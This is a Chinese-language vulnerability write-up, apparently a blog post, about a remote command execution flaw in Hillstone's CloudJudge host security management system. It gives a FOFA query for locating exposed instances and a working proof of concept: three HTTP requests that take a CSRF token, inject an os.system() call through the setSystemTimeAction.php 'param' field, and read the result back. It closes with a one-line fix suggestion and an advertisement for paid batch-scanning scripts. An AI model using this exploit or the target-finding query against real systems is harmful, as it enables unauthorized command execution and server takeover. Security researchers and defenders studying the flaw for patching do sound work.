山石网科云鉴安全管理系统 setsystemtimeaction rce漏洞

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

山石网科云鉴主机安全管理系统,围绕主机检测、响应、预防可持续安全运营,实现主机安全全生命周期管理。通过对主机进行脆弱性检测、东西向微隔离管控、多错点风险检测、多层级安全响应等措施,解决主机资产管理、安全加固、东西向流量防护、威胁实时检测、应急响应、失陷主机定位等安全问题,能够有效帮助安全管理人员应对日趋严峻的主机风险态。

0x03 漏洞威胁

由于该软件的 Web 应用对用户的输入未进行有效过滤,直接拼接系统命令执行,造成了远程命令执行漏洞。攻击者可通过构造恶意请求,拼接命令执行任意代码,控制服务器。

影响模块:

复制代码
getMessageSettingAction, /master/ajaxActions/setSystemTimeAction.php, /admin/client.php

0x04 漏洞环境

FOFA:

复制代码
body="山石云鉴主机安全管理系统"

0x05 漏洞复现

POC

复制代码
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: 
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

通过补丁修复

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25

星球福利:每天更新最新漏洞POC、资料文献、内部工具等

相关推荐
一次旅行5 天前
网络安全总结
安全·web安全
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp5 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp5 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
上海云盾商务经理杨杨5 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全
岛屿旅人5 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
上海云盾商务经理杨杨5 天前
2026年企业网络安全方向预防预测:在AI工业化时代构建主动免疫体系
人工智能·安全·web安全
努力的lpp5 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
志栋智能5 天前
安全超自动化:从被动防御到主动响应的革命
运维·网络·数据库·人工智能·安全·web安全·自动化
合天网安实验室5 天前
H5渗透实战:从负数金额漏洞到签名绕过
web安全·漏洞挖掘·h5渗透·签名绕过